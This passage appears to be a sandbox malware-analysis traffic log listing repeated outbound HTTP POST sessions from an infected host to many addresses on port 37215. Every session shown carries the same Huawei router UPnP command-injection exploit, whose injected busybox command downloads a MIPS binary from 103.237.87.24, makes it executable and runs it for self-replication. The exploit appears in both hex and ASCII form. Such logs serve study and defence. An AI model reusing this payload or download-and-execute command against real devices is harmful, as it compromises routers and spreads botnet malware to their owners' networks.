20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2059192.168.2.1348138157.21.156.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575504065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2060192.168.2.135952241.165.133.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575509071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2061192.168.2.1341986157.204.106.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575541019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2062192.168.2.1355104197.255.163.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575545073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2063192.168.2.1341250157.196.124.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575557947 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2064192.168.2.134764841.99.143.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575573921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2065192.168.2.1349602157.54.161.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575584888 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2066192.168.2.1360390157.224.175.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575603008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2067192.168.2.1348696157.239.252.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575607061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2068192.168.2.135643071.33.128.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575620890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2069192.168.2.1352928105.223.0.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.576453924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
